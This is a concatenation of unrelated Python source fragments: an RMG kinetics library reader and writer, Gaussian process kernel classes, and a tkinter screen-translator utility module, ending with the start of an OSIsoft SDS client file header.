kinetics.arrheniusHigh.comment = ''
reaction.kinetics = kinetics
items = line.split('/')
A, n, Ea = items[1].split()
A = Quantity(float(A), Aunits[len(reactants)+1])
n = Quantity(float(n), '')
Ea = Quantity(float(Ea), Eunits)
kinetics.arrheniusLow = Arrhenius(A=A, n=n, Ea=Ea, T0=1.0)
elif 'TROE' in line:
# This line contains Troe falloff parameters in Chemkin format
# Upgrade the kinetics to a Troe if not already done
if isinstance(kinetics, Lindemann):
kinetics = Troe(arrheniusLow=kinetics.arrheniusLow,
arrheniusHigh=kinetics.arrheniusHigh,
efficiencies=kinetics.efficiencies,
comment=kinetics.comment)
reaction.kinetics = kinetics
elif isinstance(kinetics, ThirdBody):
kinetics = Troe(arrheniusHigh=kinetics.arrheniusLow,
efficiencies=kinetics.efficiencies,
comment=kinetics.comment)
reaction.kinetics = kinetics
elif isinstance(kinetics, Arrhenius):
kinetics = Troe(arrheniusHigh=kinetics, comment=kinetics.comment)
kinetics.arrheniusHigh.comment = ''
reaction.kinetics = kinetics
items = line.split('/')
items = items[1].split()
if len(items) == 3:
alpha, T3, T1 = items; T2 = None
else:
alpha, T3, T1, T2 = items
kinetics.alpha = Quantity(float(alpha))
kinetics.T1 = Quantity(float(T1),"K")
if T2 is not None:
kinetics.T2 = Quantity(float(T2),"K")
else:
kinetics.T2 = None
kinetics.T3 = Quantity(float(T3),"K")
elif 'DUPLICATE' in line or 'DUP' in line:
reaction.duplicate = True
else:
# This line contains collider efficiencies
# Upgrade the kinetics to a Lindemann if not already done
if isinstance(kinetics, Arrhenius):
kinetics = Lindemann(arrheniusHigh=kinetics, comment=kinetics.comment)
kinetics.arrheniusHigh.comment = ''
reaction.kinetics = kinetics
items = line.split('/')
for spec, eff in zip(items[0::2], items[1::2]):
spec = str(spec).strip()
# In old database, N2, He, Ne, and Ar were treated as special "bath gas" species
# These bath gas species were not required to be in the species dictionary
# The new database removes this special case, and requires all colliders to be explicitly defined
# This is hardcoding to handle these special colliders
if spec.upper() in ['N2', 'HE', 'AR', 'NE'] and spec not in species:
if spec.upper() == 'N2':
species[spec] = Species(label='N2', molecule=[Molecule().fromSMILES('N#N')])
elif spec.upper() == 'HE':
species[spec] = Species(label='He', molecule=[Molecule().fromAdjacencyList('1 He 0')])
elif spec.upper() == 'AR':
species[spec] = Species(label='Ar', molecule=[Molecule().fromAdjacencyList('1 Ar 0')])
elif spec.upper() == 'NE':
species[spec] = Species(label='Ne', molecule=[Molecule().fromAdjacencyList('1 Ne 0')])
if spec not in species:
logging.warning('Collider {0} for reaction {1} not found in species dictionary.'.format(spec, reaction))
else:
kinetics.efficiencies[species[spec].molecule[0]] = float(eff)
if 'Unit:' in line:
inUnitSection = True; inReactionSection = False
elif 'Reactions:' in line:
inUnitSection = False; inReactionSection = True
except (DatabaseError, InvalidAdjacencyListError), e:
logging.exception('Error while reading old reactions file {0}.'.format(path))
logging.exception(str(e))
raise
except IOError, e:
logging.exception('Database dictionary file "' + e.filename + '" not found.')
raise
finally:
if fdict: fdict.close()
return reactions
def saveOld(self, path):
"""
Save an old-style reaction library to `path`. This creates files named
``species.txt``, ``reactions.txt``, and ``pdepreactions.txt`` in the
given directory; these contain the species dictionary, high-pressure
limit reactions and kinetics, and pressure-dependent reactions and
kinetics, respectively.
"""
try:
os.makedirs(path)
except OSError:
pass
def writeArrhenius(f, arrhenius):
f.write(' {0:<12.3E} {1:>7.3f} {2:>11.2f} {3}{4:g} {5:g} {6:g}\n'.format(
arrhenius.A.value,
arrhenius.n.value,
arrhenius.Ea.value / 4.184,
'*' if arrhenius.A.isUncertaintyMultiplicative() else '',
arrhenius.A.uncertainty,
arrhenius.n.uncertainty,
arrhenius.Ea.uncertainty / 4.184,
))
# Gather all of the species used in this kinetics library
speciesDict = self.getSpecies()
# Also include colliders in the above
for entry in self.entries.values():
if isinstance(entry.data, ThirdBody):
for molecule in entry.data.efficiencies:
formula = molecule.getFormula()
if formula in ['He', 'Ar', 'N2', 'Ne']:
pass
else:
found = False
for species in speciesDict.values():
for mol in species.molecule:
if mol.isIsomorphic(molecule):
found = True
break
if not found:
speciesDict[formula] = Species(label=formula, molecule=[molecule])
entries = self.entries.values()
entries.sort(key=lambda x: x.index)
# Save the species dictionary
speciesList = speciesDict.values()
speciesList.sort(key=lambda x: x.label)
f = open(os.path.join(path, 'species.txt'), 'w')
for species in speciesList:
f.write(species.molecule[0].toAdjacencyList(label=species.label, removeH=True) + "\n")
f.close()
# Save the high-pressure limit reactions
# Currently only Arrhenius kinetics are allowed
f = open(os.path.join(path, 'reactions.txt'), 'w')
f.write('Unit:\n')
f.write('A: mol/m3/s\n')
f.write('E: cal/mol\n\n')
f.write('Reactions:\n')
for entry in entries:
kinetics = entry.data
rateList = []
if isinstance(kinetics, MultiKinetics):
entry.item.duplicate = True
for rate in kinetics.kineticsList:
if not rate.isPressureDependent():
rateList.append(rate)
else:
if not kinetics.isPressureDependent():
rateList.append(kinetics)
for rate in rateList:
# Write reaction equation
f.write('{0:<59}'.format(entry.item))
# Write kinetics
if isinstance(rate, Arrhenius):
writeArrhenius(f, rate)
else:
raise DatabaseError('Unexpected kinetics type "{0}" encountered while saving old kinetics library (reactions.txt).'.format(rate.__class__))
# Mark as duplicate if needed
if entry.item.duplicate:
f.write(' DUPLICATE\n')
f.close()
# Save the pressure-dependent reactions
# Currently only ThirdBody, Lindemann, Troe, and PDepArrhenius kinetics are allowed
f = open(os.path.join(path, 'pdepreactions.txt'), 'w')
f.write('Unit:\n')
f.write('A: mol/m3/s\n')
f.write('E: cal/mol\n\n')
f.write('Reactions:\n')
for entry in entries:
kinetics = entry.data
if not kinetics.isPressureDependent():
continue
rateList = []
if isinstance(kinetics, MultiKinetics):
entry.item.duplicate = True
for rate in kinetics.kineticsList:
if rate.isPressureDependent():
rateList.append(rate)
else:
rateList.append(kinetics)
for rate in rateList:
# Write reaction equation
equation = str(entry.item)
if entry.item.reversible:
index = equation.find('<=>')
else:
index = equation.find('=>')
if isinstance(rate, ThirdBody) and not isinstance(rate, Lindemann):
equation = '{0}+ M {1} + M'.format(equation[0:index], equation[index:])
elif isinstance(rate, PDepArrhenius):
pass
else:
equation = '{0}(+M) {1} (+M)'.format(equation[0:index], equation[index:])
f.write('{0:<59}'.format(equation))
# Write kinetics
if isinstance(rate, ThirdBody):
if isinstance(rate, Lindemann):
# Lindemann (and Troe) fall-off have the High-P as default, and Low-P labeled LOW
writeArrhenius(f, rate.arrheniusHigh)
else:
# Non-falloff ThirdBody reactions are always in the Low-P limit
writeArrhenius(f, rate.arrheniusLow)
if len(rate.efficiencies) > 0:
eff_line = ''
for molecule, efficiency in rate.efficiencies.iteritems():
for spec in speciesDict.values():
if molecule in spec.molecule:
mol_label = spec.label
break
else:
mol_label = molecule.getFormula().upper()
eff_line += '{0}/{1:g}/ '.format(mol_label, efficiency)
f.write(eff_line.strip() + '\n')
if isinstance(rate, Lindemann):
f.write(' LOW / {0:10.3e} {1:9.3f} {2:10.2f}/\n'.format(
rate.arrheniusLow.A.value,
rate.arrheniusLow.n.value,
rate.arrheniusLow.Ea.value / 4.184,
))
if isinstance(rate, Troe):
if rate.T2 is not None:
f.write(' TROE / {0:10.4f} {1:10.2g} {2:10.2g} {3:10.2g}/\n'.format(
rate.alpha.value,
rate.T3.value,
rate.T1.value,
rate.T2.value,
))
else:
f.write(' TROE / {0:10.4f} {1:10.2g} {2:10.2g}/\n'.format(
rate.alpha.value,
rate.T3.value,
rate.T1.value,
))
elif isinstance(rate, PDepArrhenius):
writeArrhenius(f, rate.arrhenius[-1])
for pressure, arrhenius in zip(rate.pressures.values, rate.arrhenius):
f.write(' PLOG / {0:10g} {1:10.3e} {2:9.3f} {3:10.2f} /\n'.format(
pressure / 1e5,
arrhenius.A.value,
arrhenius.n.value,
arrhenius.Ea.value / 4.184,
))
else:
raise DatabaseError('Unexpected kinetics type "{0}" encountered while saving old kinetics library (reactions.txt).'.format(rate.__class__))
# Mark as duplicate if needed
if entry.item.duplicate:
f.write(' DUPLICATE\n')
f.write('\n')
f.close()
################################################################################
class KineticsGroups(Database):
"""
A class for working with an RMG kinetics family group additivity values.
"""
def __init__(self,
entries=None,
top=None,
label='',
name='',
shortDesc='',
longDesc='',
forwardTemplate=None,
forwardRecipe=None,
reverseTemplate=None,
reverseRecipe=None,
forbidden=None
):
Database.__init__(self, entries, top, label, name, shortDesc, longDesc)
self.numReactants = 0
def __repr__(self):
return '<KineticsGroups "{0}">'.format(self.label)
def loadEntry(self, index, label, group, kinetics, reference=None, referenceType='', shortDesc='', longDesc='', history=None):
if group[0:3].upper() == 'OR{' or group[0:4].upper() == 'AND{' or group[0:7].upper() == 'NOT OR{' or group[0:8].upper() == 'NOT AND{':
item = makeLogicNode(group)
else:
item = Group().fromAdjacencyList(group)
self.entries[label] = Entry(
index = index,
label = label,
item = item,
data = kinetics,
reference = reference,
referenceType = referenceType,
shortDesc = shortDesc,
longDesc = longDesc.strip(),
history = history or [],
)
def | |
colored('CS', self.depth())
def default(self, eff_dimensions):
return ConstKernel(0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Const'
@staticmethod
def description():
return "Constant"
@staticmethod
def params_description():
return "Output variance"
class ConstKernel(BaseKernel):
def __init__(self, output_variance, eff_dimensions):
self.output_variance = output_variance
self.eff_dimensions = eff_dimensions
def family(self):
return ConstKernelFamily()
def gpml_kernel_expression(self):
return '{@covConst}'
def english_name(self):
return 'CS'
def id_name(self):
return 'Const'
def param_vector(self):
# order of args matches GPML
return np.array([self.output_variance, self.eff_dimensions])
def copy(self):
return ConstKernel(self.output_variance, self.eff_dimensions)
def default_params_replaced(self, sd=1, data_shape=None):
result = self.param_vector()
if result[0] == 0:
# Set scale factor with output scale
result[0] = np.random.normal(loc=data_shape['output_scale'], scale=sd)
return result
def __repr__(self):
return 'ConstKernel(output_variance=%f, eff_dimensions=%s)' % \
(self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('CS(sf=%1.1f, dim=%s)' % (self.output_variance, ','.join([str(x) for x in self.eff_dimensions])),
self.depth())
def latex_print(self):
return 'CS'
def id_name(self):
return 'Const'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.output_variance - other.output_variance]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.output_variance - other.output_variance]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
class LinKernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
offset, lengthscale, location, eff_dimensions = params
return LinKernel(offset=offset, lengthscale=lengthscale, location=location, eff_dimensions=eff_dimensions)
def num_params(self):
return 4
def pretty_print(self):
return colored('LN', self.depth())
def default(self, eff_dimensions):
return LinKernel(-2.0, 0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Lin'
@staticmethod
def description():
return "Linear"
@staticmethod
def params_description():
return "bias"
class LinKernel(BaseKernel):
# FIXME - Caution - magic numbers! This one means offset of essentially zero and scale of 1
# FIXME - lengthscale is actually an inverse scale
def __init__(self, offset, lengthscale, location, eff_dimensions):
self.offset = offset
self.lengthscale = lengthscale
self.location = location
self.eff_dimensions = eff_dimensions
def family(self):
return LinKernelFamily()
def gpml_kernel_expression(self):
return '{@covSum, {@covConst, @covLINscaleshift}}'
def english_name(self):
return 'LN'
def id_name(self):
return 'Lin'
def param_vector(self):
# order of args matches GPML
return np.array([self.offset, self.lengthscale, self.location, self.eff_dimensions])
def default_params_replaced(self, sd=1, data_shape=None):
result = self.param_vector()
if result[0] == -2:
#### Caution - magic numbers - Offset assumed to be near zero since non zero means covered by constant kernel
result[0] = np.random.normal(loc=-10, scale=sd)
if result[1] == 0:
# Lengthscale scales with ratio of y std and x std (gradient = delta y / delta x)
if np.random.rand() < 0.5:
result[1] = np.random.normal(loc=data_shape['output_scale'] - data_shape['input_scale'], scale=sd)
else:
result[1] = np.random.normal(loc=0, scale=sd)
if result[2] == 0:
# Location moves with input location, and variance scales in input variance
result[2] = np.random.normal(loc=data_shape['input_location'], scale=sd*np.exp(data_shape['input_scale']))
return result
def effective_params(self):
'''It's linear regression'''
return 2
def copy(self):
return LinKernel(offset=self.offset, lengthscale=self.lengthscale, location=self.location, eff_dimensions=self.eff_dimensions)
def __repr__(self):
return 'LinKernel(offset=%f, lengthscale=%f, location=%f, eff_dimensions=%s)' % \
(self.offset, self.lengthscale, self.location, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('LN(off=%1.1f, ell=%1.1f, loc=%1.1f, dim=%s)' % (self.offset, self.lengthscale, self.location,
','.join([str(x) for x in self.eff_dimensions])), self.depth())
def latex_print(self):
return 'Lin'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.offset - other.offset, self.lengthscale - other.lengthscale, self.location - other.location]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.lengthscale - other.lengthscale]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
class QuadraticKernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
offset, output_variance, eff_dimensions = params
return QuadraticKernel(offset, output_variance, eff_dimensions)
def num_params(self):
return 3
def pretty_print(self):
return colored('QD', self.depth())
def default(self, eff_dimensions):
return QuadraticKernel(0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Quad'
@staticmethod
def description():
return "Quadratic"
@staticmethod
def params_description():
return "offset"
class QuadraticKernel(BaseKernel):
def __init__(self, offset, output_variance, eff_dimensions):
#### FIXME - Should the offset defauly to something small? Or will we never use this kernel
#### If using this kernel we should also add the default params replaced function
self.offset = offset
self.output_variance = output_variance
self.eff_dimensions = eff_dimensions
def family(self):
return QuadraticKernelFamily()
def gpml_kernel_expression(self):
return '{@covPoly, 2}'
def english_name(self):
return 'QD'
def id_name(self):
return 'Quad'
def param_vector(self):
# order of args matches GPML
return np.array([self.offset, self.output_variance, self.eff_dimensions])
def copy(self):
return QuadraticKernel(self.offset, self.output_variance, self.eff_dimensions)
def __repr__(self):
return 'QuadraticKernel(offset=%f, output_variance=%f, eff_dimensions=%s)' % \
(self.offset, self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('QD(off=%1.1f, sf=%1.1f, dim=%s)' % (self.offset, self.output_variance,
','.join([str(x) for x in self.eff_dimensions])), self.depth())
def latex_print(self):
return 'QD'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.offset - other.offset, self.output_variance - other.output_variance]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.offset - other.offset, self.output_variance - other.output_variance]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
class CubicKernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
offset, output_variance, eff_dimensions = params
return CubicKernel(offset, output_variance, eff_dimensions)
def num_params(self):
return 3
def pretty_print(self):
return colored('CB', self.depth())
def default(self, eff_dimensions):
return CubicKernel(0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'Cubic'
@staticmethod
def description():
return "Cubic"
@staticmethod
def params_description():
return "offset"
class CubicKernel(BaseKernel):
def __init__(self, offset, output_variance, eff_dimensions):
#### FIXME - Should the offset defauly to something small? Or will we never use this kernel
#### If using this kernel we should also add the default params replaced function
self.offset = offset
self.output_variance = output_variance
self.eff_dimensions = eff_dimensions
def family(self):
return CubicKernelFamily()
def gpml_kernel_expression(self):
return '{@covPoly, 3}'
def english_name(self):
return 'CB'
def id_name(self):
return 'Cubic'
def param_vector(self):
# order of args matches GPML
return np.array([self.offset, self.output_variance, self.eff_dimensions])
def copy(self):
return CubicKernel(self.offset, self.output_variance, self.eff_dimensions)
def __repr__(self):
return 'CubicKernel(offset=%f, output_variance=%f, eff_dimensions=%s)' % \
(self.offset, self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
def pretty_print(self):
return colored('CB(off=%1.1f, sf=%1.1f, dim=%s)' % (self.offset, self.output_variance,
','.join([str(x) for x in self.eff_dimensions])), self.depth())
def latex_print(self):
return 'CB'
def __cmp__(self, other):
assert isinstance(other, Kernel)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
differences = [self.offset - other.offset, self.output_variance - other.output_variance]
differences = map(shrink_below_tolerance, differences)
return cmp(differences, [0] * len(differences))
# max_diff = max(np.abs([self.offset - other.offset, self.output_variance - other.output_variance]))
# return max_diff > CMP_TOLERANCE
# return cmp((self.lengthscale, self.output_variance, self.alpha),
# (other.lengthscale, other.output_variance, other.alpha))
def depth(self):
return 0
class PP0KernelFamily(BaseKernelFamily):
def from_param_vector(self, params):
lengthscale, output_variance, eff_dimensions = params
return PP0Kernel(lengthscale, output_variance, eff_dimensions)
def num_params(self):
return 3
def pretty_print(self):
return colored('P0', self.depth())
def default(self, eff_dimensions):
return PP0Kernel(0., 0., range(eff_dimensions))
def __cmp__(self, other):
assert isinstance(other, KernelFamily)
if cmp(self.__class__, other.__class__):
return cmp(self.__class__, other.__class__)
return 0
def depth(self):
return 0
def id_name(self):
return 'PP0'
@staticmethod
def description():
return "Piecewise Polynomial 0"
@staticmethod
def params_description():
return "lengthscale"
class PP0Kernel(BaseKernel):
def __init__(self, lengthscale, output_variance, eff_dimensions):
self.output_variance = output_variance
self.lengthscale = lengthscale
self.eff_dimensions = eff_dimensions
def family(self):
return PP0KernelFamily()
def gpml_kernel_expression(self):
return '{@covPPiso, 0}'
def english_name(self):
return 'P0'
def id_name(self):
return 'PP0'
def param_vector(self):
# order of args matches GPML
return np.array([self.lengthscale, self.output_variance, self.eff_dimensions])
def default_params_replaced(self, sd=1, data_shape=None):
result = self.param_vector()
if result[0] == 0:
# Set lengthscale with input scale
if np.random.rand() < 0.5:
result[0] = np.random.normal(loc=data_shape['input_scale'], scale=sd)
else:
result[0] = np.random.normal(loc=0, scale=sd)
if result[1] == 0:
# Set scale factor with output scale
if np.random.rand() < 0.5:
result[1] = np.random.normal(loc=data_shape['output_scale'], scale=sd)
else:
result[1] = np.random.normal(loc=0, scale=sd)
return result
def copy(self):
return PP0Kernel(self.lengthscale, self.output_variance, self.eff_dimensions)
def __repr__(self):
return 'PP0Kernel(lengthscale=%f, output_variance=%f, eff_dimensions=%s)' % (self.lengthscale,
self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
| |
# Internal
import tkinter as tk
import subprocess
import asyncio
import os
from time import localtime, strftime
# Ext
import webbrowser
# User Defined
from screen_translate.JsonHandling import JsonHandler
from screen_translate.LangCode import *
from screen_translate.Mbox import Mbox
from screeninfo import get_monitors
# ---------------------------------------------------------------
# Settings to capture all screens
from PIL import ImageGrab
from functools import partial
ImageGrab.grab = partial(ImageGrab.grab, all_screens=True)
# Add try except to intercept connection error
try:
from screen_translate.Translate import *
except Exception as e:
print("Error", str(e))
Mbox("Error", e, 2)
try:
from screen_translate.Translate_Deepl import *
except Exception as e:
print("Error", str(e))
Mbox("Error", e, 2)
# ---------------------------------------------------------------
# --------------------- Public Classes --------------------------
# ---------------------------------------------------------------
class Global_Class:
"""
Class containing all the static variables for the UI. It also contains some methods
for the stuff to works, such as the hotkey callback, the translate method, etc.
Stored like this in order to allow other file to use the same thing without circular import error.
"""
def __init__(self):
# Create gimmick window to store global var
self.gimmickWindow = tk.Tk()
self.gimmickWindow.withdraw()
# Reference main ui
self.main = None
self.main_Ui = None
# Text box
self.text_Box_Top_Var = tk.StringVar()
self.text_Box_Bottom_Var = tk.StringVar()
# Flag variables
self.hotkeyCapTlPressed = False
self.hotkeySnipCapTlPressed = False
self.capUiHidden = True
# Capture opacities
self.curCapOpacity = 0.8
self.captureSlider_Main = None
self.captureSlider_Cap = None
self.captureOpacityLabel_Main = None
self.captureOpacityLabel_CapSetting = None
# CB TL
self.langTo = None
self.langFrom = None # THis neeeds to change everytime the user changes the language and on innit
self.engine = None
self.mboxOpen = False
# Version
self.version = "1.8.4"
self.versionType = "release"
self.newVerStatusCache = None
# Logo
self.logoPath = None
# Query box
self.queryBg = None
self.queryFg = None
self.queryFont = None
# Result box
self.resultBg = None
self.resultFg = None
self.resultFont = None
# Status lbl
self.programStatusLabel = None
self.connectionStatusLabel = None
# Log
self.logVar = None
def setConnected(self):
self.connectionStatusLabel.config(fg="green")
self.main_Ui.update_idletasks()
def setDisconnected(self):
self.connectionStatusLabel.config(fg="red")
self.main_Ui.update_idletasks()
def statusChange(self, newStatus, settings):
if settings['logging']['enabled']:
maxLine = settings['logging']['max_line']
if maxLine < 1:
maxLine = 1
elif maxLine > 1000:
maxLine = 1000
oldText = self.logVar.get()
currTime = strftime("%H:%M:%S", localtime())
nlines = len(oldText.splitlines())
if nlines == maxLine:
# Remove the first line
oldText = oldText.splitlines()[1:]
oldText = "\n".join(oldText)
oldText += f"\n[{currTime}] {newStatus}"
self.logVar.set(oldText)
def set_Status_Ready(self):
self.programStatusLabel.config(fg="green")
self.main_Ui.update_idletasks()
def set_Status_Busy(self):
self.programStatusLabel.config(fg="blue")
self.main_Ui.update_idletasks()
def set_Status_Warning(self):
self.programStatusLabel.config(fg="#f7bd01")
self.main_Ui.update_idletasks()
def set_Status_Error(self):
self.programStatusLabel.config(fg="red")
self.main_Ui.update_idletasks()
def hotkeyCapTLCallback(self):
"""Callback for the hotkey to capture the screen"""
self.hotkeyCapTlPressed = True
def hotkeySnipCapTLCallback(self):
"""Callback for the hotkey to snip the screen"""
self.hotkeySnipCapTlPressed = True
# Translate
def translate(self, settings):
"""Translate the text"""
self.set_Status_Busy()
self.statusChange(f"Translating from {self.langFrom} to {self.langTo} using {self.engine}", settings)
# Only check the langfrom and langto if it is translating
if self.engine != "None":
# If source and destination are the same
if(self.langFrom) == (self.langTo):
self.set_Status_Error()
self.statusChange("Error: Language target is the same as source", settings)
Mbox("Error: Language target is the same as source", "Language target is the same as source! Please choose a different language", 2, self.main_Ui)
print("Error Language is the same as source! Please choose a different language")
self.set_Status_Warning()
return
# If langto not set
if self.langTo == "Auto-Detect":
self.set_Status_Error()
self.statusChange("Error: Invalid Language Selected", settings)
Mbox("Error: Invalid Language Selected", "Must specify language destination", 2, self.main_Ui)
print("Error: Invalid Language Selected! Must specify language destination")
self.set_Status_Warning()
return
# Get the text from the textbox
query = self.text_Box_Top_Var.get()
# Read settings
showAlert = settings["show_no_text_alert"]
historyIsSaved = settings['saveHistory']
# If the text is empty
if(len(query) < 1):
self.set_Status_Warning()
self.statusChange("No text entered! Please enter some text", settings)
print("Error: No text entered! Please enter some text")
# If show alert is true then show a message box alert, else dont show any popup
if showAlert:
Mbox("Error: No text entered", "Please enter some text", 2, self.main_Ui)
return
# Translate
# --------------------------------
# Google Translate
if self.engine == "Google Translate":
oldMethod = False
if "- Alt" in self.langFrom or "- Alt" in self.langTo:
oldMethod = True
isSuccess, translateResult = google_tl(query, self.langTo, self.langFrom, oldMethod=oldMethod)
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# Deepl
elif self.engine == "Deepl":
loop = asyncio.get_event_loop()
loop.run_until_complete(self.getDeeplTl(query, self.langTo, self.langFrom, historyIsSaved, settings))
# --------------------------------
# MyMemoryTranslator
elif self.engine == "MyMemoryTranslator":
isSuccess, translateResult = memory_tl(query, self.langTo, self.langFrom)
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# PONS
elif self.engine == "PONS":
isSuccess, translateResult = pons_tl(query, self.langTo, self.langFrom)
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# LibreTranslate
elif self.engine == "LibreTranslate":
isSuccess, translateResult = libre_tl(query, self.langTo, self.langFrom, https=settings['libreTl']['https'], host=settings['libreTl']['host'], port=settings['libreTl']['port'], apiKeys=settings['libreTl']['api_key'])
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# Wrong opts
else:
print("Please select a correct engine")
Mbox("Error: Engine Not Set!", "Please select a correct engine", 2, self.main_Ui)
# Get Deepl TL
async def getDeeplTl(self, text, langTo, langFrom, saveToHistory, settings):
"""Get the translated text from deepl.<EMAIL>"""
isSuccess, translateResult = await deepl_tl(text, langTo, langFrom)
self.fillTextBoxAndSaveHistory(isSuccess, text, translateResult, saveToHistory, settings)
# Save to History
def fillTextBoxAndSaveHistory(self, isSuccess, query, translateResult, saveToHistory, settings):
"""Save the text to history"""
if(isSuccess):
self.text_Box_Bottom_Var.set(translateResult)
if saveToHistory:
# Write to History
new_data = {
"from": self.langFrom,
"to": self.langTo,
"query": query,
"result": translateResult,
"engine": self.engine
}
fJson.writeAdd_History(new_data)
self.statusChange("Saved translation to history", settings)
self.statusChange("Successfully translated the text", settings)
self.set_Status_Ready()
else:
self.set_Status_Error()
self.statusChange("Fail to translate and save to history", settings)
Mbox("Error: Translation Failed", translateResult, 2, self.main_Ui)
self.set_Status_Warning()
# Allowed keys
def allowedKey(self, event):
key = event.keysym
# Allow
if key.lower() in ['left', 'right']: # Arrow left right
return
if (4 == event.state and key == 'a'): # Ctrl + a
return
if (4 == event.state and key == 'c'): # Ctrl + c
return
# If not allowed
return "break"
# ---------------------------------------------------------------
"""
TextWithVar, taken from: https://stackoverflow.com/questions/21507178/tkinter-text-binding-a-variable-to-widget-text-contents
"""
class TextWithVar(tk.Text):
'''A text widget that accepts a 'textvariable' option'''
def __init__(self, parent, *args, **kwargs):
try:
self._textvariable = kwargs.pop("textvariable")
except KeyError:
self._textvariable = None
tk.Text.__init__(self, parent, *args, **kwargs)
# if the variable has data in it, use it to initialize
# the widget
if self._textvariable is not None:
self.insert("1.0", self._textvariable.get())
# this defines an internal proxy which generates a
# virtual event whenever text is inserted or deleted
self.tk.eval('''
proc widget_proxy {widget widget_command args} {
# call the real tk widget command with the real args
set result [uplevel [linsert $args 0 $widget_command]]
# if the contents changed, generate an event we can bind to
if {([lindex $args 0] in {insert replace delete})} {
event generate $widget <<Change>> -when tail
}
# return the result from the real widget command
return $result
}
''')
# this replaces the underlying widget with the proxy
self.tk.eval('''
rename {widget} _{widget}
interp alias {{}} ::{widget} {{}} widget_proxy {widget} _{widget}
'''.format(widget=str(self)))
# set up a binding to update the variable whenever
# the widget changes
self.bind("<<Change>>", self._on_widget_change)
# set up a trace to update the text widget when the
# variable changes
if self._textvariable is not None:
self._textvariable.trace("wu", self._on_var_change)
def _on_var_change(self, *args):
'''Change the text widget when the associated textvariable changes'''
# only change the widget if something actually
# changed, otherwise we'll get into an endless
# loop
text_current = self.get("1.0", "end-1c")
var_current = self._textvariable.get()
if text_current != var_current:
self.delete("1.0", "end")
self.insert("1.0", var_current)
def _on_widget_change(self, event=None):
'''Change the variable when the widget changes'''
if self._textvariable is not None:
self._textvariable.set(self.get("1.0", "end-1c"))
# ---------------------------------------------------------------
# Tooltip
"""
Original from: https://stackoverflow.com/questions/3221956/how-do-i-display-tooltips-in-tkinter
"""
class CreateToolTip(object):
"""
create a tooltip for a given widget
"""
def __init__(self, widget, text='widget info', delay=250, wraplength=180, opacity=1.0, always_on_top=True):
self.waittime = delay #miliseconds
self.wraplength = wraplength #pixels
self.widget = widget
self.text = text
self.opacity = opacity
self.always_on_top = always_on_top
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.leave)
self.widget.bind("<ButtonPress>", self.leave)
self.id = None
self.tw = None
def enter(self, event=None):
self.schedule()
def leave(self, event=None):
self.unschedule()
self.hidetip()
def schedule(self):
self.unschedule()
self.id = self.widget.after(self.waittime, self.showtip)
def unschedule(self):
id = self.id
self.id = None
if id:
self.widget.after_cancel(id)
def showtip(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = tk.Toplevel(self.widget)
# Make it stay on top
self.tw.wm_attributes('-topmost', self.always_on_top)
# Make it a little transparent
self.tw.wm_attributes('-alpha', self.opacity)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
| |
<reponame>hanhossain/OCS-Samples<filename>basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py<gh_stars>0
# SdsClient.py
#
# Copyright (C) 2018 OSIsoft, LLC. All rights reserved.
#
# THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF
# OSIsoft, LLC. USE, DISCLOSURE, OR REPRODUCTION IS PROHIBITED WITHOUT
